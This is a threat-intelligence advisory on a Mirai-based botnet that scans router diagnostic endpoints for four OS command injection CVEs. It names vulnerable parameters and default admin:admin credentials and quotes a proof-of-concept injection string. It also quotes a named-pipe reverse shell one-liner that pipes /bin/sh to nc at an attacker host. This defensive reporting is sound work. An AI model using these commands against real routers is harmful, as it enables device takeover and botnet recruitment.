# Botnet Scanning Internet-Exposed Router Diagnostic Tools Exploiting OS Command Injection (CVE-2024-12856, CVE-2013-7179, CVE-2020-8949, CVE-2024-48419)

> A Mirai-based botnet is conducting concentrated HTTP reconnaissance scanning against a fixed set of diagnostic CGI endpoints (/apply.cgi, /cgi-bin/diagnostic.cgi, /diag_ping.cgi, /goform/diagTool, etc.) on internet-exposed routers, hunting for known OS command injection flaws in Four-Faith (CVE-2024-12856), Seowon Intech (CVE-2013-7179), Gocloud (CVE-2020-8949), and Edimax (CVE-2024-48419) devices. Successful compromise spawns a reverse shell and downloads a Mirai-like payload, enrolling the router into a DDoS-capable botnet. The pattern is consistent with the gayfemboy Mirai botnet, which has weaponized CVE-2024-12856 as a zero-day since November 2024 and DDoS-for-profit at ~100 Gbps.

- **Published:** 2026-08-05T00:00:00Z
- **Last reviewed:** 2026-08-05T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-1884
- **ID:** TL-2026-1884
- **Severity:** HIGH (CVSS 8.8)
- **Category:** VULNERABILITY
- **Status:** ACTIVE
- **Detections:** 9 · **IOCs:** 26 (full data via the Threadlinqs MCP server — Purple tier)
- **CVEs:** CVE-2024-12856, CVE-2013-7179, CVE-2020-8949, CVE-2024-48419

## Description

Starting on or around 2026-08-04, SANS ISC (diary #33214) and independent reporting documented a botnet performing systematic HTTP reconnaissance against a tight, fixed set of router diagnostic URLs, each observed served at count=20 in the scan corpus. The targeted endpoints (/apply.cgi, /cgi-bin/adv_ping.cgi, /cgi-bin/diagnostic.cgi, /cgi-bin/DiagnosticsMsg.cgi, /cgi-bin/ping.cgi, /cgi-bin/system_mgr.cgi, /cgi-bin/traceroute.cgi, /diag_ping.cgi, /goform/diagTool, /goform/ping, /ping_test.cgi, /sys_diag.html) all back web-based ping, traceroute, and system-diagnostics utilities. Diagnostic tools of this class are a well-known source of OS command injection because they concatenate user-supplied hostnames directly into shell command strings (e.g., os.system("ping -c 1 -w2 " + hostname)).

The scanning targets four specific command-injection CVEs. CVE-2024-12856 affects Four-Faith F3x24/F3x36 industrial routers at firmware 2.0 via the /apply.cgi adj_time_year parameter (submit_type=adjust_sys_time); the device ships with default admin:admin credentials (HTTP Basic auth, base64 YWRtaW46YWRtaW4=), which effectively converts the post-authentication flaw into unauthenticated remote command injection. Censys identified over 15,000 internet-facing Four-Faith routers, concentrated in Turkey, China, Spain, and Hungary. CVE-2013-7179 affects the Seowon Intech SWC-9100 router and requires no authentication: the ping_ipaddr parameter of cgi-bin/diagnostic.cgi passes user-supplied targets directly into a shell command (PoC injection: 127.0.0.1>/dev/null; ls -lash /etc). CVE-2020-8949 affects multiple Gocloud router models (S2A, S2A_WL, S3A, S3A K2P MTK, ISP3000) via the cgi-bin/webui/admin/tools/app_ping/diag_ping/ ping endpoint. CVE-2024-48419 affects the Edimax BR-6476AC (AC1200) router at firmware 1.06 via three goahead form handlers (/goform/tracerouteDiagnosis, /goform/pingDiagnosis, /goform/fromSysToolPingCmd), allowing injection of arbitrary shell commands as root; the device is end-of-life with no patch expected and has no anti-CSRF protection.

This exploitation pattern is consistent with the gayfemboy Mirai botnet first documented by QiAnXin XLab in February 2024. Gayfemboy weaponized CVE-2024-12856 as a zero-day beginning November 9, 2024 (observed by DucklingStudio honeypots), uploads a custom UPX-packed Mirai payload to compromised routers, and has grown to over 15,000 daily active bot IPs conducting DDoS-for-profit attacks (10-30 second bursts at roughly 100 Gbps). The post-exploitation chain documented in the Four-Faith case uses a named-pipe reverse shell (mknod bOY p; cat bOY|/bin/sh -i 2>&1|nc <attacker> <port> >bOY; rm bOY;) followed by Mirai payload drop. A related Mirai variant, RondoDox (Fortinet), also exploits CVE-2024-12856 and uses a decoded C2 at 83.150.218.93. The botnet's scanning of diagnostic endpoints should be treated as a reliable indicator of targeted command-injection campaigns rather than benign scan noise.

## MITRE ATT&CK

- T1595 Active Scanning
- T1588 Obtain Capabilities
- T1190 Exploit Public-Facing Application
- T1078 Valid Accounts
- T1059 Command and Scripting Interpreter
- T1027 Obfuscated Files or Information
- T1046 Network Service Discovery
- T1071 Application Layer Protocol

## Sources

- [SANS ISC Diary #33214 - Botnet Hunting for Vulnerabilities in Diagnostic Tools](https://isc.sans.edu/diary/33214)
- [Botnet Scans Router Diagnostic Tools, Exploits Known Vulnerabilities (GBHackers)](https://gbhackers.com/botnet-scans-router-diagnostic-tools/)
- [NVD - CVE-2024-12856](https://nvd.nist.gov/vuln/detail/CVE-2024-12856)
- [NVD - CVE-2013-7179](https://nvd.nist.gov/vuln/detail/CVE-2013-7179)
- [NVD - CVE-2020-8949](https://nvd.nist.gov/vuln/detail/CVE-2020-8949)
- [NVD - CVE-2024-48419](https://nvd.nist.gov/vuln/detail/CVE-2024-48419)
- [VulnCheck - Four-Faith CVE-2024-12856 technical analysis and Suricata rule](https://vulncheck.com/blog/four-faith-cve-2024-12856)
- [QiAnXin XLab - Gayfemboy: A Botnet Delivered Through a Four-Faith Router 0-Day](https://blog.xlab.qianxin.com/gayfemboy-en/)
- [The Hacker News - 15,000+ Four-Faith Routers Exposed to New Exploit Due to Default Credentials](https://thehackernews.com/2025/01/mirai-botnet-variant-exploits-four.html)
- [BleepingComputer - Hackers exploit Four-Faith router flaw to open reverse shells](https://www.bleepingcomputer.com/news/security/hackers-exploit-four-faith-router-flaw-to-open-reverse-shells/)
- [BleepingComputer - New Mirai botnet targets industrial routers with zero-day exploits](https://www.bleepingcomputer.com/news/security/new-mirai-botnet-targets-industrial-routers-with-zero-day-exploits/)
- [Fortinet FortiGuard - RondoDox: Breaking Down a Botnet Threat](https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat)
- [Fortinet FortiGuard - Resurgence of IoT Malware: Inside Gayfemboy](https://www.fortinet.com/blog/threat-research/iot-malware-gayfemboy-mirai-based-botnet-campaign)
- [Security Affairs - IoT under siege: The Return of Gayfemboy](https://securityaffairs.com/181480/cyber-crime/iot-under-siege-the-return-of-the-mirai-based-gayfemboy-botnet.html)
- [CERT/CC Vulnerability Note VU#431726 - Seowon Intech SWC-9100 command injection](http://www.kb.cert.org/vuls/id/431726)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-1884
